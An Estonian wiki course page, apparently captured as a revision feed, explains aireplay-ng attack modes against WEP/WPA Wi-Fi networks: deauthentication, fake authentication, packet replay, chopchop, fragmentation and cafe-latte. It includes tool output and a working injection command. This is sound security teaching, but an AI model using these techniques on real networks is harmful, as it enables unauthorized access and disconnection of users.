&amp;lt;pre&amp;gt;&lt;br /&gt;
Saving chosen packet in replay_src-0124-161120.cap&lt;br /&gt;
 Data packet found!&lt;br /&gt;
 Sending fragmented packet&lt;br /&gt;
 Got RELAYED packet!!&lt;br /&gt;
 Thats our ARP packet!&lt;br /&gt;
 Trying to get 384 bytes of a keystream&lt;br /&gt;
 Got RELAYED packet!!&lt;br /&gt;
 Thats our ARP packet!&lt;br /&gt;
 Trying to get 1500 bytes of a keystream&lt;br /&gt;
 Got RELAYED packet!!&lt;br /&gt;
 Thats our ARP packet!&lt;br /&gt;
 Saving keystream in fragment-0124-161129.xor&lt;br /&gt;
 Now you can build a packet with packetforge-ng out of that 1500 bytes keystream&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Ja meil ongi olemas .xor fail millega saab &#039;&#039;custom&#039;&#039; pakette injectida. Muidugi on vajalik assotsiaseeritud klienti kelle nimelt pakette injectida.[12]&lt;br /&gt;
&lt;br /&gt;
==Rünnak 6: Cafe-latte attack==&lt;br /&gt;
Iga WEP klient kes saab ARP päringu vastab sellele automaatselt korrektselt krüptitud ARP vastustega - AP ei pea selles etapis tõestama et ta WEP võtit teab.&lt;br /&gt;
Selle rünnakuga saab kinnipüütud paketis pöörata ümber mõned bitid mille käigus pööratakse kliendi ARP päring ta enda poole tagasi. Saates võltsitud ARP päringut kliendile korduvalt saame kinni püüda suurel hulgal korrektseid krüptitud ARP vastuseid.[13]&lt;br /&gt;
&lt;br /&gt;
See rünnak töötab kuna WEP ei ole nõrk mitte ainult statistilise analüüsi rünnakute vastu, vaid tal puudub ka krüptograafilise tugevusega paki integrity kontroll.&lt;br /&gt;
Lühidalt öeldes ei suuda osapooled eristada võltsitud/modifitseeritud paketti korrektsest pakist.[13]&lt;br /&gt;
&lt;br /&gt;
Iga WEP pakett kasutab CRC checksumi ülekande vigade tuvastamiseks. Ammu aga teatakse et ründaja saab muuta nii paki sisu kui ka CRC&#039;d et luua uus korrektne pakk. Cafe-latte kasutab neid nõrkusi ja muudab ära saatja MACi ja saatja IP aadressi mis sisalduvad kliendi ARP päringus ning suunavad need kliendi vastu.[13]&lt;br /&gt;
&lt;br /&gt;
Kuna klient ei suuda võltsingut eristada, vastabki ka igale päringule.[13]&lt;br /&gt;
&lt;br /&gt;
===Kasutamine===&lt;br /&gt;
Seda rünnakut saab kasutada reaalsest võrgust eraldatud kliendi puhul. Kliendid teevad tuntud võrkude otsimisel PROBE päringuid, millele saab ründaja siis fake APga vastata. Sellisel juhul peaks kasutama &amp;quot;-D&amp;quot; argumenti et lülitada välja AP otsimine.[14]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Rünnak 7: Client-oriented fragmentation attack==&lt;br /&gt;
Selle rünnakuga saab kasutada suvalist IP või ARP paketti. See laiendab Cafe-Latte rünnakut lubades kasutada suvalist paketti kliendilt.&lt;br /&gt;
Sellest paketist peame genereerima ARP päringu. ARPil peab asuma baidipositsioonil 33 target IP ja target MAC peab olema nullbaidi jada.&lt;br /&gt;
Praktikas võib target MAC olla aga suvaline väärtus.[15]&lt;br /&gt;
&lt;br /&gt;
Saadud pakis on teada koht kus asub source IP - bait 23 ARP puhul ja 21 IP puhul. Eeldatakse et pakk on ARP kui paki suurus on 68 või 86 baiti, vastaseljuhul eeldatakse et on IP pakett.[15]&lt;br /&gt;
&lt;br /&gt;
Valiidse ARP päringu saatmiseks kliendile peame liigutama source IP positsioonile 33. Muidugi ei saa seda niisama lihtsalt teha - pakk ei valideeruks. Selle vastu kasutame aga paketi fragmenteerimist. ARP saadetakse kliendile kahe fragmendina. Esimese fragmendi pikkus valitakse niimoodi et paketi kokkupanemisel kliendi poolt satuks incoming source IP positsioonile 33. Teine fragment on pakett mis kliendilt alguses saadi.[15]&lt;br /&gt;
&lt;br /&gt;
IP Paketi puhul kasutatakse sarnast meetodit. Aga kuna PRGA materjali on vähem, siis saadetakse välja kolm fragmenti pluss algne pakk.[15]&lt;br /&gt;
&lt;br /&gt;
Igaljuhul kasutatakse CRC korrektsuse säilitamiseks bit-flippingut. Sama meetodit kasutatakse ka ARP paketi source MAC&#039;i muutmiseks juhul kui seal on algselt multicast.[15]&lt;br /&gt;
&lt;br /&gt;
=Viited=&lt;br /&gt;
[1] http://www.aircrack-ng.org/doku.php?id=aireplay-ng&lt;br /&gt;
&lt;br /&gt;
[2] http://www.aircrack-ng.org/doku.php?id=deauthentication&lt;br /&gt;
&lt;br /&gt;
[3] http://www.aircrack-ng.org/doku.php?id=fake_authentication&lt;br /&gt;
&lt;br /&gt;
[4] https://secure.wikimedia.org/wikipedia/en/wiki/Wired_Equivalent_Privacy&lt;br /&gt;
&lt;br /&gt;
[5] http://documentation.netgear.com/reference/sve/wireless/WirelessNetworkingBasics-3-08.html&lt;br /&gt;
&lt;br /&gt;
[6] http://documentation.netgear.com/reference/sve/wireless/WirelessNetworkingBasics-3-09.html&lt;br /&gt;
&lt;br /&gt;
[7] http://www.aircrack-ng.org/doku.php?id=shared_key&lt;br /&gt;
&lt;br /&gt;
[8] http://www.aircrack-ng.org/doku.php?id=interactive_packet_replay&lt;br /&gt;
&lt;br /&gt;
[9] http://www.aircrack-ng.org/doku.php?id=arp-request_reinjection&lt;br /&gt;
&lt;br /&gt;
[10] http://www.aircrack-ng.org/doku.php?id=korek_chopchop&lt;br /&gt;
&lt;br /&gt;
[11] http://www.informit.com/guides/content.aspx?g=security&amp;amp;seqNum=197&lt;br /&gt;
&lt;br /&gt;
[12] http://www.aircrack-ng.org/doku.php?id=fragmentation&lt;br /&gt;
&lt;br /&gt;
[13] http://www.wi-fiplanet.com/tutorials/article.php/10724_3716241_2&lt;br /&gt;
&lt;br /&gt;
[14] http://www.aircrack-ng.org/doku.php?id=cafe-latte&lt;br /&gt;
&lt;br /&gt;
[15] http://www.aircrack-ng.org/doku.php?id=hirte&lt;br /&gt;
&lt;br /&gt;
\[\[Category:Traadita_side_alused]]&lt;/div&gt;</summary>
		<author><name>Tliiv</name></author>
	</entry>
	<entry>
		<id>https://wiki.itcollege.ee/index.php?title=Aireplay-ng_r%C3%BCndere%C5%BEiimid&amp;diff=30976</id>
		<title>Aireplay-ng ründerežiimid</title>
		<link rel="alternate" type="text/html" href="https://wiki.itcollege.ee/index.php?title=Aireplay-ng_r%C3%BCndere%C5%BEiimid&amp;diff=30976"/>
		<updated>2011-05-10T10:29:05Z</updated>

		<summary type="html">&lt;p&gt;Tliiv: /* Teooria */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Sissejuhatus=&lt;br /&gt;
&lt;br /&gt;
Aireplay-ng`d kasutatakse &#039;&#039;frame&#039;&#039;`de sisestamiseks võrguliiklusesse.[1]&lt;br /&gt;
&lt;br /&gt;
Peamine funktsioon on liikluse genereerimine hilisemaks kasutamiseks aircrack-ng`s - [https://secure.wikimedia.org/wikipedia/en/wiki/Wired_Equivalent_Privacy WEP] ja [https://secure.wikimedia.org/wikipedia/en/wiki/WPA-PSK WPA-PSK] võtmete lahtimurdmiseks. Erinevad rünnakuviisid võimaldavad tekitada deautentimist WPA &#039;&#039;handshake&#039;&#039; pakettide püüdmiseks, võlts deautentimiseks, interaktiivseks pakettide taasmängimiseks ja käsitsi valmistatud ARP päringute sisestamiseks liiklusesse.[1]&lt;br /&gt;
&lt;br /&gt;
=Eelteadmised=&lt;br /&gt;
WEP ja WPA/WPA2 võrkude ründamiseks on vajalikud mõned konkreetsed eelteadmised. Nende teadmine lihtsustab suurel määral võimalike probleemide lahendamist ja annab paremini aimu millega tegu on ja kuidas asjad &#039;&#039;backendis&#039;&#039; töötavad - ei teki näiteks viga kus üritatakse taasmängida paketti kui ühtegi klienti pole APga assotsiaseerunud.&lt;br /&gt;
&lt;br /&gt;
Samuti eeldatakse et teatakse aireplay-ng põhikäske ja argumente - nullist õppimiseks ei ole see mõeldud.&lt;br /&gt;
&lt;br /&gt;
==WEP==&lt;br /&gt;
WEPi ründamiseks on vaja eristada Open Authentication ja Shared Key Authentication süsteemi&lt;br /&gt;
===Open Authentication===&lt;br /&gt;
[http://documentation.netgear.com/reference/sve/wireless/images/WEPauthenticationOpen.jpg][5]&lt;br /&gt;
&lt;br /&gt;
* Klient saadab autentimis päringu AP&#039;le.[5]&lt;br /&gt;
* AP autentib kliendi.[5]&lt;br /&gt;
** AP laseb selles etapis kõik kliendid läbi, st. mingit autentimist(sõna otseses mõttes) ei toimu[5]&lt;br /&gt;
* Klient assotsiaseerub AP&#039;ga ja liitub võrguga.[5]&lt;br /&gt;
** Selles etapis hakkavad mõlemad osapooled andmeid saatma WEPi krüpteeringuga, st. edasiseks suhtlemiseks on vaja teada salajast võtit. Sellesse punkti jõudes on võimalik assotsiaseerunud kliendi MACiga saata AP&#039;le pakette(nõrkus).[5]&lt;br /&gt;
&lt;br /&gt;
===Shared Key Authentication===&lt;br /&gt;
[http://documentation.netgear.com/reference/sve/wireless/images/WEPauthenticationShared.jpg] [6]&lt;br /&gt;
&lt;br /&gt;
* Klient saadab autentimise päringu AP&#039;le.[6]&lt;br /&gt;
* AP saadab kliendile &#039;&#039;random&#039;&#039; baidijada(ülesanne).[6]&lt;br /&gt;
* Klient kasutab oma 64- või 128bitist salajast võtit ning krüptib saadud baidijada ära, ning saadab tagasi AP&#039;le.[6]&lt;br /&gt;
* AP dekrüptib saadud jada ning võrdleb seda esialgu väljasaadetud stringiga, kui need ei kattu, siis saadetakse kliendile negatiivne vastus. Kui kattub siis järelikult on kliendil ja AP&#039;l sama WEP võti, ning AP autentib kliendi ära.[6]&lt;br /&gt;
* Klient ühendub võrku.[6]&lt;br /&gt;
&lt;br /&gt;
Sellisel juhul ei ole võimalik autentimisest edasi saada ilma võtmeta, ning seega ei saa ka AP&#039;le pakke võrku sisestada. (Lahendus probleemile on #Shared Key Authentication artikli all)&lt;br /&gt;
&lt;br /&gt;
=Meetodid=&lt;br /&gt;
Meetodite pealkrijade ees on &amp;quot;Rünnak x:&amp;quot;. x tähistab numbrit mitmes implementeeritud rünnak see on ja seda numbrit aksepteerib aireplay-ng ka vastava käsurea lipu argumendina.&lt;br /&gt;
==Rünnak 0: Deauthentication==&lt;br /&gt;
&lt;br /&gt;
See meetod saab disassotsiaseerumise paketi ühele või rohkemale kliendile kes on parasjagu vastava &#039;&#039;access pointiga&#039;&#039; assotsiaseerunud. Klientide lahtiühendamisel võib olla mitu eesmärki:[2]&lt;br /&gt;
&lt;br /&gt;
* Peidetud ESSID kättesaamine. See on ESSID mida access point ei kuuluta &#039;&#039;broadcastis&#039;&#039;.[2]&lt;br /&gt;
* WPA/WPA2 handshake kinnipüüdmine sundides klienti uuesti autentima.(Ei ole kohustuslik, võib oodata ka kuni klient ise uuesti ühendub)[2]&lt;br /&gt;
* ARP päringute genereerimine(Windowsi kliendid võivad mõnikord oma ARP &#039;&#039;cache&#039;&#039; tühjendada kui ühendus ära kaob)[2]&lt;br /&gt;
&lt;br /&gt;
NB! Arusaadavalt on see rünnak täiesti kasutu kui traadita ühenduspunkti küljes ei ole ühtegi reaalset assotsiaseerunud klienti või võlts autentitud klienti.[2]&lt;br /&gt;
&lt;br /&gt;
===Meetodid===&lt;br /&gt;
&lt;br /&gt;
====Suunatud====&lt;br /&gt;
&amp;lt;pre&amp;gt;Waiting for beacon frame (BSSID: 00:14:6C:7E:40:80) on channel 9&lt;br /&gt;
12:35:25  Sending 64 directed DeAuth. STMAC: [00:0F:B5:AE:CE:9D] [ 61|63 ACKs]&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* BSSID peab olema sihtmärk AP korrektne MAC aadress[2]&lt;br /&gt;
* kanal peab olema sama millel AP reaalselt räägib[2]&lt;br /&gt;
* STMAC on rünnatava kliendi korrektne MAC aadress[2]&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;Sending 64 directed&#039;&#039;&#039; - saadeti välja 64 suunatud deautentimise paketti, st. 64 kliendile ja 64 AP&#039;le.[2]&lt;br /&gt;
* &#039;&#039;&#039;61&#039;&#039;&#039; - mitu paketti klient kätte sai[2]&lt;br /&gt;
* &#039;&#039;&#039;63&#039;&#039;&#039; - mitu paketti AP kätte sai[2]&lt;br /&gt;
&lt;br /&gt;
Kui 61 ja 63 on arvud mis on suhteliselt stabiilsed ja lähedal 64&#039;le, siis tähendab see seda et mõlemad osapooled on sinu võrgukaardi antennist kuuldekaugusel ja nendega on võimalik infot vahetada. Kui üks neist numbritest on väike, siis tähendab seda et asud vastavast osapoolest liiga kaugel - sellisel juhul see rünnak ei tööta, sul on vaja kas saatja saatevõimet suurendada, või minna osapoolele füüsiliselt lähemale.[2]&lt;br /&gt;
&lt;br /&gt;
Suunatud &#039;&#039;versus&#039;&#039; broadcast olukorras on alati soovitav kasutada suunatud varianti, kuna paljud kliendid ignoreerivad broadcastis saadetud lahtiühendamise paketti.[2]&lt;br /&gt;
&lt;br /&gt;
Kui sulle kliendi ACK&#039;ide arv tundub korrektne, aga sulle ikkagi ei tundu et ta ennast lahti ühendaks, siis võib probleem peituda selles et ta ühendub uuesti liiga kiiresti.[2]&lt;br /&gt;
&lt;br /&gt;
====Broadcast====&lt;br /&gt;
&amp;lt;pre&amp;gt;Waiting for beacon frame (BSSID: 00:14:6C:7E:40:80) on channel 9&lt;br /&gt;
NB: this attack is more effective when targeting&lt;br /&gt;
a connected wireless client (-c &amp;lt;client&#039;s mac&amp;gt;).&lt;br /&gt;
15:49:32  Sending DeAuth to broadcast -- BSSID: [00:14:6C:7E:40:80]&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nagu mainitud, &#039;&#039;broadcast&#039;&#039; lahtiühendamine on vähem efektiivsem.&lt;br /&gt;
&lt;br /&gt;
==Rünnak 1: Fake authentication==&lt;br /&gt;
Võlts autentimine lubab läbi viia nii Open System kui ka Shared Key WEP autentimist, peale selle teeb ta ka assotsiatsiooni access pointiga. See on kasulik ainult siis kui sul on vaja AP&#039;le pakettide saatmiseks assotsiaseeritud klienti, selle puudumisel ei võta AP ühtegi talle saadetud pakki vastu. Kui meil on aga reaalne klient, siis saame tema nimel pakke saata, kui pole, on vaja võlts autentimist.&lt;br /&gt;
Võlts autentimine ei tekita ARP pakette(seega ei piisa selle üksi kasutamisest) ja ei suuda assotsiaseeruda WPA/WPA2 access pointidega.[3]&lt;br /&gt;
&lt;br /&gt;
Fake authenticationit ei tohi kasutada aktiivse kliendi MACiga. See on eriti sobilik meetod selliseks juhuks kui olemasolevalt kliendilt on kinni püütud näiteks ARP pakett, ning klient ühendub lahti enne kui suudad piisavalt arp pakette tagasi mängida. Sellisel juhul aitab sama kliendi MACiga fake autentimine ning siis seda kinnipüütud pakki uuesti/edasi mängida.&lt;br /&gt;
&lt;br /&gt;
===Meetodid===&lt;br /&gt;
====Open Authentication====&lt;br /&gt;
Open authentication puhul ei üritata klienti enne assotsiaseerumist autentida, seega saame kerge vaevaga ennast ära assotsiaseeruda ning hakata AP&#039;ga suhtlema. Selles etapis hakkavad tavakliendid WEP&#039;i(ja seega ka salajast võtit) kasutades rääkima, meie aga saame sisestada juba korrektse võtmega krüptitud(reaalselt kliendilt varem püütud) pakke AP&#039;le saatma, uuesti ja uuesti.[4]&lt;br /&gt;
&amp;lt;pre&amp;gt;18:18:20  Sending Authentication Request&lt;br /&gt;
18:18:20  Authentication successful&lt;br /&gt;
18:18:20  Sending Association Request&lt;br /&gt;
18:18:20  Association successful :-)&amp;lt;/pre&amp;gt;&lt;br /&gt;
Sellisel juhul on assotsiaseerumine õnnestunud võib jätkata teiste rünnakutega - AP võtab vastu vastavalt MACilt tulevaid pakke, ja saadab õigetes tingimustes ka vastuseid.[4]&lt;br /&gt;
&lt;br /&gt;
====Shared Key Authentication====&lt;br /&gt;
SKA tähendab seda, et AP ei räägi potensiaalse kliendiga mitte midagi, va. WEP võtmega autentimise protokoll, seega ei ole võimalik meil AP&#039;ga assotsiaseeruda(me ei tea ju salajast võtit millega autentimisel AP saadetud puzzle ära &amp;quot;lahendada&amp;quot;) ning sellest tulenevalt ei saa me ka AP&#039;le mingeid pakke saata.&lt;br /&gt;
&amp;lt;pre&amp;gt;15:46:53  Sending Authentication Request&lt;br /&gt;
15:46:53  AP rejects open-system authentication&lt;br /&gt;
Please specify a PRGA-file (-y).&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Sellisel juhul on vaja kinni püüda SKA &#039;&#039;handshake&#039;&#039; paketid. See toimub automaatselt kui airodump-ng näeb mõnda WEP-SKA handshake&#039;i. Deauthentimise rünnakuga saab seda olemasolevale kliendile sundida.[7]&lt;br /&gt;
&lt;br /&gt;
Kinnipüütud &#039;&#039;handshake&#039;&#039;`id salvestatakse &amp;quot;sharedkey-01-00-14-6C-7E-40-80.xor&amp;quot; formaadis faili. See fail tuleb vastavasse AP&#039;sse fake autentimisel/kliendi disconnectimisks anda kaasa &amp;quot;-y&amp;quot; käsurea argumendiga.[7]&lt;br /&gt;
&lt;br /&gt;
NOTE: Kui airodump-ng jookseb ilma aktiivseid rünnakuid AP pihta tegemata, siis on AUTH väli WEP AP taga tühi. Kui airodump-ng näeb mända handshake&#039;i siis tuleb AUTH välja sisse SKA, samal hetkel salvestatakse ka fail.[7]&lt;br /&gt;
&lt;br /&gt;
==Rünnak 2: Interactive packet replay==&lt;br /&gt;
&lt;br /&gt;
See rünnak lubab valida konkreetse paketti mida taasmängida. Selle meetodiga saab pakette lugeda kahest kohast, võrgust ja failist. Keskendume võrgust püüdmisele.&lt;br /&gt;
Et interaktiivne uuestimängimine töötaks on tähtis veidi alusteadmisi paketivoo kohta. Iga pakett ei tööta selle rünnakuga. Õnnestumine tähendab seda et AP võtab paki vastu ja genereerib uue IV - WEP ründamiseks on vaja ju koguda palju IV&#039;sid.&lt;br /&gt;
Väga kasulik on panna peale ka &amp;quot;-m 68 -n 86&amp;quot; filtrid. Need filtreerivad vastavalt minimaalse paki suuruse(68- traadita klientilt) ja maksimaalse(86- traadiga kliendilt). Need on WEP ühenduses ARP pakettide suurused ning õigesti kasutades peaksid tagama vastuse AP poolt.[8]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Naturaalsed paketid===&lt;br /&gt;
&lt;br /&gt;
Et seda teha, tuleb meil kas taasmängida originaalpaketti, või paketti veidi manipuleerida.  AP&#039;d edastavad(tekitavad uue IV) alati pakkidele mis on suunatud broadcast MACi(FF:FF:FF:FF:FF:FF) vastu. Selline omadus on näiteks ARP pakettidel. Peale selle on vajalik et pakett liiguks traadita kliendist traadiga võrku. Sellisel pakettil on &amp;quot;To DS&amp;quot; lipuke seatud &amp;quot;1&amp;quot; peale.&lt;br /&gt;
Need  filtrid on seadistatavad -b,-d ja -t argumentidega.[8]&lt;br /&gt;
&lt;br /&gt;
===Manipuleeritavad pakid===&lt;br /&gt;
&lt;br /&gt;
Eesmärk, nagu alati, on panna AP genereerima uusi IV&#039;sid. Ainuke vajalik argument on &amp;quot;-t 1&amp;quot; - see selekteerib ainult pakette mis liiguvad etherneti suunas.&lt;br /&gt;
&lt;br /&gt;
Me ei hooli ka mis lõppunkti MAC aadress on, kuna  me saame selle ära muuta.  Selleks on &amp;quot;-p 0841&amp;quot; argument, mis  muudab paki põhimõtte selliseks nagu ta saadetaks kliendist  AP&#039;sse - põmst. muudab &amp;quot;To DS&amp;quot; lipu &amp;quot;1&amp;quot;. Vaja on anda ka &amp;quot;-c&amp;quot; väärtuseks broadcast MAC.[8]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Klientideta võrgu ründamine===&lt;br /&gt;
Sellel meetodil on väga huvitav omadus see, et saab rünnata ka traadita-klientideta AP&#039;d. Jooksuta aireplay-d kõige elementaarsemate argumentidega:&lt;br /&gt;
&amp;lt;pre&amp;gt;aireplay-ng -2 -b 00:14:6C:7E:40:80 -d FF:FF:FF:FF:FF:FF -t 1 ath0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nüüd jääb üle vaid oodata kuni mõni pakett broadcasti saadetakse. Pole tähtis milline pakket, sisesta lihtsalt &amp;quot;y&amp;quot; esimesele tulevale pakile ja AP hakkab IV&#039;sid genereerima. Negatiivne külg asjal on tõsiasi et paljud pakid on suhteliselt suured - suured pakid genereerivad IV&#039;sid aeglasemalt. Suur pluss on see et ei ole vaja kinni püüda xor paketistriimi(chopchop või fragmenteeritud rünnakud), ehitada pakki ja käivitada relay rünnakut.[8]&lt;br /&gt;
&lt;br /&gt;
==Rünnak 3: ARP request replay attack==&lt;br /&gt;
Klassikaline ARP päringu taasmängimise rünnak on efektiivseim viis IV&#039;de genereerimiseks, ja ta töötab ka piisavalt stabiilselt. Programm kuulab ARP paketti(tunneb ära kindlate mittekrüptimata väljade järgi ja paki pikkuse järgi) ning hakkab seda AP&#039;le taasmängima. See omakorda põhjustab igale päringu vastusele uue IV genereerimise.&lt;br /&gt;
Seda rünnakut võib lugeda interaktiivse taasmängimise erijuhuks.[9]&lt;br /&gt;
&lt;br /&gt;
==Rünnak 4: KoreK chopchop attack==&lt;br /&gt;
See rünnak suudab hea õnne korral dekrüptida WEP paketi ilma salajast võtit teadmata. Meetod võib töötada isegi dünaamilise WEP vastu. See rünnak ei tagasta sulle WEP salajast võtit, vaid paketi sisu ja selle paketi krüptimiseks kasutatud keystreami. Mõned AP&#039;d ei ole sellele rünnakule avatud. Kui AP dropib pakke mille pikkus on alla 42 baidi, siis aireplay üritab ülejäänud baidid ära arvata - edukuse tõenäosus oleneb headerite ennustusvõimest. Kui püütakse kinni IP pakett, siis tehakse lisaks veel checksum kontroll peale arvatava lisabaitide juurdelisamist. Rünnakuks on vaja vähemalt ühte WEP paketti.[10]&lt;br /&gt;
&lt;br /&gt;
===Teooria===&lt;br /&gt;
KoreK kasutab hästituntud nõrga ICV[link] probleemi ja järeldab sellest, et kui pakki lühendada ühe baidi võrra, siis saab sellest ehitada uue korrektse paki, kuna uus ICV on otseselt seotud puuduva krüptimata baidiga. [11]&lt;br /&gt;
&lt;br /&gt;
Esimene samm on võtta püütud pakett (M) ja eemaldada viimane bait, et saada sõnum M-1. Kuna me ei tea eemaldatud baidi &#039;&#039;plaintekst&#039;&#039; väärtust, peame hakkama seda arvama. Õnneks on ainult 256 võimalikku baidiväärtust. Esmaks eeldame siis et eemaldatud bait oli 0x00 ja paneme saadud sõnumi valemisse(liiga mahukas et siin kirjeldada), et luua abitmask mis üritab muuta ebakorrektset M-1 paketti valiidseks M-1 paketiks. Siis proovime paki korrektsust pritsides selle võrku. Kui AP selle kätte saab, siis kontrollitakse seda ja vastavalt aksepteeritakse või ignoreeritakse. Iga saadetud pakk baseerub arvataval baidil, niiet tõenäosus õige olla on 1/256. Kui pakett on aga õige, siis AP valideerib selle ja edastab võrku. Eeldades et sa samal ajal kuulad võrku saad näha kui AP seda teeb. Sellisel juhul tead mis on paki viimane bait. Siis on võimalik arvutada PRGA väärtus mida kasutati selle plaintekst baidi krüptimiseks(P XOR M = RC4 PRGA). Ühesõnaga, ründaja saab bait baidi haaval kogu paketi niimoodi ära arvata, boonuseks on ka keystream millega saad oma paki luua.[11]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt; .........&lt;br /&gt;
 Offset   38 (90% done) | xor = FD | pt = 08 |  229 frames written in   688ms&lt;br /&gt;
 Offset   37 (92% done) | xor = 13 | pt = 01 |  232 frames written in   695ms&lt;br /&gt;
 Offset   36 (94% done) | xor = 83 | pt = 00 |   19 frames written in    58ms&lt;br /&gt;
 Offset   35 (96% done) | xor = 4E | pt = 06 |  230 frames written in   689ms&lt;br /&gt;
 Sent 957 packets, current guess: B9...&lt;br /&gt;
 &lt;br /&gt;
 The AP appears to drop packets shorter than 35 bytes.&lt;br /&gt;
 Enabling standard workaround: ARP header re-creation.&lt;br /&gt;
 &lt;br /&gt;
 Saving plaintext in replay_dec-0201-191706.cap&lt;br /&gt;
 Saving keystream in replay_dec-0201-191706.xor&lt;br /&gt;
 &lt;br /&gt;
 Completed in 21s (2.29 bytes/s)&amp;lt;/pre&amp;gt;&lt;br /&gt;
Jee! Saad kasutada xor faili oma paki injectimiseks või lugeda paki sisu .cap failist. Vaata ainult et paki injectimisel kasutad autentitud source maci, väga väheste ruuterite korral töötab paki sisestamine &#039;&#039;broadcasti&#039;&#039; ilma autentimata. Soovitatav on võtta ka lühem pakett kuna dekrüptimise aeg on lineaarselt seotud paketi pikkusega.[10]&lt;br /&gt;
&lt;br /&gt;
==Rünnak 5: Fragmentation attack==&lt;br /&gt;
Õnnestumise korral suudab see rünnak tagastada sulle kuni 1500 baiti PRGA&#039;d. See rünnak ei tagasta WEP võtit. Saadud PRGA&#039;ga saab krüptida oma loodud pakette ja neid võrku injectida. Ründamiseks on vaja saada AP&#039;lt vähemalt üks pakett.[12]&lt;br /&gt;
&lt;br /&gt;
Põhimõtteliselt saab proigramm paketist väikese hulga võtmematerjali ning üritab saata ARP või LLC pakette(sisu on teada) AP&#039;le. Kui pakett kajatakse tagasi AP poolt siis saab tagstatud paketi põhjal tuletada suurema hulga PRGA baite. Tsüklit saab korrata kuni saadakse kätte kuni 1500 baiti.[12]&lt;br /&gt;
&lt;br /&gt;
See rünnak nõuab head ühendust AP&#039;ga, kuna ründaja fragmenteerib pakette ja AP peab need kõik kätte saama.[12]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Saving chosen packet in replay_src-0124-161120.cap&lt;br /&gt;
 Data packet found!&lt;br /&gt;
 Sending fragmented packet&lt;br /&gt;
 Got RELAYED packet!!&lt;br /&gt;
 Thats our ARP packet!&lt;br /&gt;
 Trying to get 384 bytes of a keystream&lt;br /&gt;
 Got RELAYED packet!!&lt;br /&gt;
 Thats our ARP packet!&lt;br /&gt;
 Trying to get 1500 bytes of a keystream&lt;br /&gt;
 Got RELAYED packet!!&lt;br /&gt;
 Thats our ARP packet!&lt;br /&gt;
 Saving keystream in fragment-0124-161129.xor&lt;br /&gt;
 Now you can build a packet with packetforge-ng out of that 1500 bytes keystream&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Ja meil ongi olemas .xor fail millega saab custom pakette injectida. Muidugi on vajalik assotsitud klienti kelle nimelt pakette injectida.[12]&lt;br /&gt;
&lt;br /&gt;
==Rünnak 6: Cafe-latte attack==&lt;br /&gt;
Iga WEP klient kes saab ARP päringu vastab sellele automaatselt korrektselt krüptitud ARP vastustega - AP ei pea selles etapis tõestama et ta WEP võtit teab.&lt;br /&gt;
Selle rünnakuga saab kinnipüütud paketis pöörata ümber mõned bitid mille käigus pööratakse kliendi ARP päring ta enda poole tagasi. Saates võltsitud ARP päringut kliendile korduvalt saame kinni püüda suurel hulgal korrektseid krüptitud ARP vastuseid.[13]&lt;br /&gt;
&lt;br /&gt;
See rünnak töötab kuna WEP ei ole nõrk mitte ainult statistilise analüüsi rünnakute vastu, vaid tal puudub ka krüptograafilise tugevusega paki integrity kontroll.&lt;br /&gt;
Lühidalt öeldes ei suuda osapooled eristada võltsitud/modifitseeritud paketti korrektsest pakist.[13]&lt;br /&gt;
&lt;br /&gt;
Iga WEP pakett kasutab CRC checksumi ülekande vigade tuvastamiseks. Ammu aga teatakse et ründaja saab muuta nii paki sisu kui ka CRC&#039;d et luua uus korrektne pakk. Cafe-latte kasutab neid nõrkusi ja muudab ära saatja MACi ja saatja IP aadressi mis sisalduvad kliendi ARP päringus ning suunavad need kliendi vastu.[13]&lt;br /&gt;
&lt;br /&gt;
Kuna klient ei suuda võltsingut eristada, vastabki ka igale päringule.[13]&lt;br /&gt;
&lt;br /&gt;
===Kasutamine===&lt;br /&gt;
Seda rünnakut saab kasutada reaalsest võrgust eraldatud kliendi puhul. Kliendid teevad tuntud võrkude otsimisel PROBE päringuid, millele saab ründaja siis fake APga vastata. Sellisel juhul peaks kasutama &amp;quot;-D&amp;quot; argumenti et lülitada välja AP otsimine.[14]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Rünnak 7: Client-oriented fragmentation attack==&lt;br /&gt;
Selle rünnakuga saab kasutada suvalist IP või ARP paketti. See laiendab Cafe-Latte rünnakut lubades kasutada suvalist paketti kliendilt.&lt;br /&gt;
Sellest paketist peame genereerima ARP päringu. ARPil peab asuma baidipositsioonil 33 target IP ja target MAC peab olema nullbaidi jada.&lt;br /&gt;
Praktikas võib target MAC olla aga suvaline väärtus.[15]&lt;br /&gt;
&lt;br /&gt;
Saadud pakis on teada koht kus asub source IP - bait 23 ARP puhul ja 21 IP puhul. Eeldatakse et pakk on ARP kui paki suurus on 68 või 86 baiti, vastaseljuhul eeldatakse et on IP pakett.[15]&lt;br /&gt;
&lt;br /&gt;
Valiidse ARP päringu saatmiseks kliendile peame liigutama source IP positsioonile 33. Muidugi ei saa seda niisama lihtsalt teha - pakk ei valideeruks. Selle vastu kasutame aga paketi fragmenteerimist. ARP saadetakse kliendile kahe fragmendina. Esimese fragmendi pikkus valitakse niimoodi et paketi kokkupanemisel kliendi poolt satuks incoming source IP positsioonile 33. Teine fragment on pakett mis kliendilt alguses saadi.[15]&lt;br /&gt;
&lt;br /&gt;
IP Paketi puhul kasutatakse sarnast meetodit. Aga kuna PRGA materjali on vähem, siis saadetakse välja kolm fragmenti pluss algne pakk.[15]&lt;br /&gt;
&lt;br /&gt;
Igaljuhul kasutatakse CRC korrektsuse säilitamiseks bit-flippingut. Sama meetodit kasutatakse ka ARP paketi source MAC&#039;i muutmiseks juhul kui seal on algselt multicast.[15]&lt;br /&gt;
&lt;br /&gt;
=Viited=&lt;br /&gt;
[1] http://www.aircrack-ng.org/doku.php?id=aireplay-ng&lt;br /&gt;
&lt;br /&gt;
